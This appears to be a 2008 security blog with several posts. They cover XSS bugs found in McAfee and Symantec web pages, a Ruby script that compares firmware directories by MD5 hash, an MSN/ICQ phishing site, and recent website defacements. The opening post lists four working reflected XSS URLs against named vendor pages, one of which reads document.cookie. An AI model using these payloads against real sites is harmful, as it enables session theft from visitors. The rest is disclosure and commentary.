13th - June - 2008 - 17:30

When the AV gets XSSed


Sometimes XSS bugs are really nice, for example if they hit major security companies worldwide, like it just happened. McAfee and Symantec have been hit by several XSS bugs that are often so simple that you wonder why they made those mistakes while coding the page... Shouldn't they at least be secure?

On XSSed.com you can find the news about it: [link]!


EXAMPLES

McAfee: ---
http://mastdb3.mcafee.com/VirusMap3.asp?ft=
"><script>alert(/XSS/)</script>

http://us.mcafee.com/root/product.asp?productid=sa&cid=
"><script>alert('TreX')</script>
---

Symantec: ---
https://www-secure.symantec.com/custserv/cgi-bin/
cs_privacy_dyn.cgi?first_name="><script>alert(/XSS/)</script>

http://securityresponse.symantec.com/security_response/
detected_writeup.jsp?name=<script>alert(document.cookie)</script>
---
	
13th - June - 2008 - 16:30

Comparing two directories by hash

Not long ago a friend of mine (Rembrandt) asked me for a little Ruby script I should code for him. The idea was the following: he has found a bug in a router firmware that could allow remote code execution, and now he was interested in knowing whether the attackable file was used in other firmwares of this vendor as well. To do this he had the following idea in mind: you take two directories, the vulnerable firmware directory and the directory of the firmware to compare it to. Now you index the files of both directories by a hash value (using MD5 in this case) and compare the files to each other. If two files (or better said: their MD5 hashes) are the same and the first one is the vulnerable file, then you can be quite sure that the bug is also present in the other firmware. To automate this whole process I coded a Ruby script that compares two directories recursively.

It is a very special case, but it can be useful and helpful; in "Releases" -> "Others" you can find the tool called [dir2md5.rb]. Enjoy!
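
Added example (my own Ruby, not dir2md5.rb): the procedure described above, indexing two directory trees by MD5 and answering the actual question, namely where the bytes of one known-vulnerable file turn up in the other tree. The demo builds two tiny constructed firmware trees in a temporary directory; file names and contents there are invented.

```ruby
require 'digest/md5'
require 'find'
require 'tmpdir'
require 'fileutils'

# Walk dir recursively and map md5 hex digest => [relative paths].
# A list is used because identical files may occur more than once.
def index_by_md5(dir)
  index = Hash.new { |h, k| h[k] = [] }
  Find.find(dir) do |path|
    next unless File.file?(path)
    rel = path.delete_prefix(dir).delete_prefix(File::SEPARATOR)
    index[Digest::MD5.file(path).hexdigest] << rel
  end
  index
end

# Every digest present in both trees: [[md5, [paths in a], [paths in b]], ...]
def shared_files(dir_a, dir_b)
  a = index_by_md5(dir_a)
  b = index_by_md5(dir_b)
  (a.keys & b.keys).sort.map { |h| [h, a[h].sort, b[h].sort] }
end

# Where the bytes of dir_a/rel_path (the known-vulnerable file) appear in dir_b.
def vulnerable_copies(dir_a, rel_path, dir_b)
  digest = Digest::MD5.file(File.join(dir_a, rel_path)).hexdigest
  index_by_md5(dir_b).fetch(digest, []).sort
end

# Constructed demo: two firmware trees, one shared binary, one changed binary.
def compare_demo
  Dir.mktmpdir('dir2md5') do |root|
    a = File.join(root, 'fw_vuln')
    b = File.join(root, 'fw_other')
    FileUtils.mkdir_p(File.join(a, 'bin'))
    FileUtils.mkdir_p(File.join(b, 'usr', 'bin'))
    File.write(File.join(a, 'bin', 'httpd'), 'vulnerable httpd v1')
    File.write(File.join(a, 'bin', 'busybox'), 'busybox')
    File.write(File.join(b, 'usr', 'bin', 'httpd'), 'vulnerable httpd v1')
    File.write(File.join(b, 'usr', 'bin', 'busybox'), 'busybox v2')
    [vulnerable_copies(a, 'bin/httpd', b), shared_files(a, b).length]
  end
end
```

Matching on the digest rather than the file name is the point: the same httpd binary is found even though it lives under a different path in the second firmware, while the changed busybox is not reported.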

12th - June - 2008 - 07:00

Slideshows of images online

Another nice gadget for you: in the section "Multimedia" -> "Images" you can now choose between downloading all the files at once (not suggested anymore!) and watching a slideshow of the images created with JAlbum 8.0 (suggested!). I hope you like this; the style is dark-silver and should fit our website quite well...

11th - June - 2008 - 16:30

New section: Videos

After some days of inactivity, which I would like to apologize for, but I had several personal things to solve first, I would like to announce a new section in Wired Security, called Videos. If you look at the left menu you won't find the link "Images" any longer; instead you can see a link called "Multimedia", which features Images and Videos, and in future maybe Audio as well, but that depends. To start off I published three videos for you.

24c3: VX - The Virus Underground by SkyOut

PH-Neutral 0x7d8 Video #1

PH-Neutral 0x7d8 Video #2

To save bandwidth please use the links to GoogleVideo!

04th - June - 2008 - 22:30

MSN/ICQ Phishing

A new phishing wave seems to be circulating against people chatting through ICQ and MSN. In the last days I got several messages just containing a link to a website, or adding something like "look at the photos of me [link]". The websites are normally subdomains of c0mpics.info, which shows the following login screen when you surf to it:

[Image: pics_for_msn_friends]

If you click on "Click here to Login with ICQ" you will see the following (quite similar):

[Image: pics_for_icq_friends]

I don't know why people click on that... Those sites are not trustworthy and, as it seems, not even illegal, because you accept the terms and conditions, which clearly say the following:

We may temporarily access your MSN account to do a combination
of the following:
1.  Send Instant Messages to your friends promoting this site.
2.  Introduce new entertaining sites to your friends via Instant
    Messages.

I have not tried to log in and don't know if there is really an image hosting service behind all this, but those advertising messages suck and maybe in future this site might be used for more malware-like actions, but that's just a theory. Anyway, I just wonder why people type in their credentials so freely without thinking about it... Just some extended information from the whois:

IP Address: 210.56.53.224
IP Location: Hong Kong
Website Status: active
Server Type: lighttpd/1.4.19
Cache Date: 2008-06-04 12:14:07 MST

And the website is hosted by:

Name: Jeff Fisher
Organization: TST Management, Inc
Address 1: Edificio Magna Corp. 5th Floor
City: Panama City
State: Panama
Zip: 0000
Country: PA
Phone: +507.2021577 

Sorry, but this does not look very trustworthy to me!

04th - June - 2008 - 21:15

June defacements

Long time no news. I have to say sorry for that, but due to several personal problems I was unwilling to update the site, was not much at my computer and not very motivated to do anything IT related. But here I am, back again, and hopefully things will be solved soon!

Well... What happened at the end of May and the beginning of June? Many interesting defacements come to my mind reading through Heise.de/Security. First off we have the Comcast hack. The American telecommunications company Comcast has been hacked by two hackers, called Defiant and EBK, of the hacker group Kryogeniks. The hackers manipulated the DNS name resolution so that Comcast's website pointed to servers controlled by the two guys. In an interview they say it was quite tricky to do this because of the immense amount of data coming in; they had to change the servers again and again to new ones and stayed up the whole night. At least Defiant also has a Myspace profile and the police are looking for them. Both are still young, about 18-19 years old, and this was a somewhat naive action that will now lead to real problems for them. Cool thing, but wrongly done...

The next hack was done on the 30th of May against the website of our beloved minister of the interior, Wolfgang Schäuble (www.wolfgang-schaeuble.de)! Not long after a reflected XSS was found in the website, attackers were able to manipulate the whole website and make their text show up on the main page when you open it. Take a look at the photo of the defacement:

[Image: wolfgang_schaeuble_hacked]

It is expected that the hack was possible due to a SQL injection vulnerability in modules of the content management software TYPO3. What I very much like about this theory: if this is true, then there was no need for any "hacking tools" and still the attackers were able to deface the website. That shows perfectly how illogical the law against those tools is!

[Image: phoenix_mars_mission]

The last hack was done against websites of the Mars mission Phoenix. Several subdomains of the main domain have been manipulated and defaced. What I like even more is the statement by Heise.de/Security: "Hilfreich können dabei auch die frei verfügbaren Scanner für SQL-Injection-Lücken wie Absinthe, SQLNinja, oder SQLix vom Open Web Application Security Project (OWASP) sein.", which translates to: "The freely available scanners for SQL injection vulnerabilities, such as Absinthe, SQLNinja or SQLix from the Open Web Application Security Project (OWASP), can also be helpful here." Hold on... Did Heise just suggest we use "hacking tools"? You see: to defend yourself you MUST use the tools of the attackers, otherwise you will never know what's going on with your page from the attacker's point of view. Another perfect example of why the German law is STUPID!


Tools mentioned by Heise can be found here:

Absinthe
=> http://www.0x90.org/releases/absinthe/download.php

SQLNinja
=> http://sqlninja.sourceforge.net/

SQLix
=> http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project